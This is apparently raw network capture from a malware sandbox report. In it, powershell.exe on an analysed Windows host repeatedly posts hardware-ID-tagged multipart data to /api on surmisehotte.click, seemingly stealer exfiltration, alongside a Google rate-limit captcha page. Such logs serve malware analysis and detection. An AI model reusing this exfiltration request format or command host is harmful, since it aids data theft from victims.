                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC982INData Raw: 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49
                                                                                                                                                                                                                                                      Data Ascii: s page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. I


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      8192.168.11.2049765172.217.15.1964438052C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC901OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                      Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:29 GMT
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                                                                                                                                      Content-Length: 3208
                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 35 62 6b 4f 6e 48 49 54 31
                                                                                                                                                                                                                                                      Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="5bkOnHIT1
                                                                                                                                                                                                                                                      2024-12-21 20:06:29 UTC1054INData Raw: 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77
                                                                                                                                                                                                                                                      Data Ascii: 0px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block w


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      9192.168.11.2049770104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:32 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=4V1B6UAQT2ODVO
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 692
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:32 UTC692OUTData Raw: 2d 2d 34 56 31 42 36 55 41 51 54 32 4f 44 56 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 34 56 31 42 36 55 41 51 54 32 4f 44 56 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 56 31 42 36 55 41 51 54 32 4f 44 56 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 34 56 31 42 36 55 41
                                                                                                                                                                                                                                                      Data Ascii: --4V1B6UAQT2ODVOContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--4V1B6UAQT2ODVOContent-Disposition: form-data; name="pid"1--4V1B6UAQT2ODVOContent-Disposition: form-data; name="lid"yJEcaG--singl6--4V1B6UA
                                                                                                                                                                                                                                                      2024-12-21 20:06:33 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:33 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=n34l84iifaehftv5k6o7m0qu27; expires=Wed, 16 Apr 2025 13:53:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBvtcWU%2BYEcUAlrnE0GVd0MwVG%2B5UPSVGM4DkPUphbdap4q%2BaQ72%2BV1fvXhSOcJ0udCoHubCRR7GeNl6HPO0fIv8EjH701c1QAXAebWeLdjDXm9bav7u1NosbUjYiYqtf4dJ3Ho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e46ce95dab5-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128932&min_rtt=128849&rtt_var=27312&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1606&delivery_rate=29657&cwnd=251&unsent_bytes=0&cid=6daf56c5dd8f25a6&ts=740&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:33 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                      2024-12-21 20:06:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      10192.168.11.2049771104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:33 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=02CXJCFFBYN2
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 20809
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:33 UTC15331OUTData Raw: 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 30 32 43 58 4a 43 46 46 42 59 4e 32 0d
                                                                                                                                                                                                                                                      Data Ascii: --02CXJCFFBYN2Content-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--02CXJCFFBYN2Content-Disposition: form-data; name="pid"2--02CXJCFFBYN2Content-Disposition: form-data; name="lid"yJEcaG--singl6--02CXJCFFBYN2
                                                                                                                                                                                                                                                      2024-12-21 20:06:33 UTC5478OUTData Raw: 52 ef 2b b0 50 93 52 cd 21 5a 45 37 59 84 2a ab e7 59 db e6 ed c4 56 d7 d8 75 7b 47 d2 68 31 1f f5 ce c4 26 80 58 00 9f 02 e2 d7 5d ef da 68 c4 65 f3 02 1a 5d e3 17 54 a9 ba eb 91 5a 95 6d a3 b1 48 ab ef e3 44 b6 cc 50 39 d2 80 18 d8 28 05 de d2 29 a7 23 a3 fd 62 e0 d2 60 f3 9c de 50 85 b6 cd a9 74 4c d8 cc 07 59 7e 6f 0c f9 6f 38 01 50 1f e0 d4 37 c7 23 5d 66 24 ce ee e1 f7 f9 c0 8d 8f a2 96 74 b9 a0 9b bc 33 c5 0f 18 ae 1a d3 37 38 e4 b5 bb 46 d8 95 3d 17 6f 0d a8 d5 98 dd 3e c6 65 f9 ed 6c 0e 6b 59 60 ab 33 1a 26 4e 75 6d ba d1 05 38 57 6f f9 d9 68 fa 51 96 5e b3 35 47 37 a9 e3 b0 8e 66 f6 1c 65 f9 69 8c b3 d9 1e 97 75 47 2b b9 79 5a f4 06 d5 35 56 b0 1a 03 eb 65 b2 76 8e 96 58 2b 9d d3 0a e3 aa 65 b3 6e 84 d7 68 9f d0 72 c9 78 92 f5 e5 d9 68 37 aa 14
                                                                                                                                                                                                                                                      Data Ascii: R+PR!ZE7Y*YVu{Gh1&X]he]TZmHDP9()#b`PtLY~oo8P7#]f$t378F=o>elkY`3&Num8WohQ^5G7feiuG+yZ5VevX+enhrxh7
                                                                                                                                                                                                                                                      2024-12-21 20:06:34 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:34 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=nf1lepkppriof5ig5mfo06f18p; expires=Wed, 16 Apr 2025 13:53:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNlWTkjFqm5itjJHXAuh%2BbbXWGgmsZmVTXkisChoVnDhNbgfLXqIIAVAEWwUMoy1h03eyFRsP19lnPUKNEmgsm9L7RRXsWx22vd8nu346EkumKDsHNDZIfjPCA0z3ESDxu8DKRc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e4cdc55da9f-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128978&min_rtt=128841&rtt_var=27391&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21767&delivery_rate=29627&cwnd=252&unsent_bytes=0&cid=6f7b6419800858c9&ts=650&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:34 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                      2024-12-21 20:06:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      11192.168.11.2049772104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:34 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=ORJ90MB0UF
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 10891
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:34 UTC10891OUTData Raw: 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a 2d 2d 4f 52 4a 39 30 4d 42 30 55 46 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                      Data Ascii: --ORJ90MB0UFContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--ORJ90MB0UFContent-Disposition: form-data; name="pid"2--ORJ90MB0UFContent-Disposition: form-data; name="lid"yJEcaG--singl6--ORJ90MB0UFContent
                                                                                                                                                                                                                                                      2024-12-21 20:06:35 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:35 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=6a316oisn2711o6th7ok62nhf0; expires=Wed, 16 Apr 2025 13:53:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=giIudcwv0qTcQP%2BtKq1vIrDt20glDLEUhsc9qSf8oWHZsWOiayXG7wxdvIiOhm%2BSlVewVsw2IF2RUNi2Q6rARUUsztUeRcPhN6NWOf%2FHlEMRytq20HCKWVNR2H3vgFA2YJQIfxE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7e52ab9221fd-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129520&min_rtt=129368&rtt_var=27531&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2844&recv_bytes=11825&delivery_rate=29478&cwnd=252&unsent_bytes=0&cid=b49d464463f0cd1e&ts=980&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:06:35 UTC24INData Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 12ok 102.129.152.205
                                                                                                                                                                                                                                                      2024-12-21 20:06:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      12192.168.11.2049773104.21.96.14439160C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:06:35 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=8FET93FDC1R7OEWWV
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 20562
                                                                                                                                                                                                                                                      Host: surmisehotte.click
                                                                                                                                                                                                                                                      2024-12-21 20:06:35 UTC15331OUTData Raw: 2d 2d 38 46 45 54 39 33 46 44 43 31 52 37 4f 45 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 36 37 38 31 36 33 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 38 46 45 54 39 33 46 44 43 31 52 37 4f 45 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 46 45 54 39 33 46 44 43 31 52 37 4f 45 57 57 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 73 69 6e 67 6c 36 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: --8FET93FDC1R7OEWWVContent-Disposition: form-data; name="hwid"71678163B129FD4CDB71E32F12885CB3--8FET93FDC1R7OEWWVContent-Disposition: form-data; name="pid"3--8FET93FDC1R7OEWWVContent-Disposition: form-data; name="lid"yJEcaG--singl6
                                                                                                                                                                                                                                                      2024-12-21 20:06:35 UTC5231OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 4d d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: Mazw\ot^:):Ln`X6Eusazw
                                                                                                                                                                                                                                                      2024-12-21 20:06:36 UTC1142INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:06:36 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=uq1rpp1u4vc6jpc2m5res3h869; expires=Wed, 16 Apr 2025 13:53:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
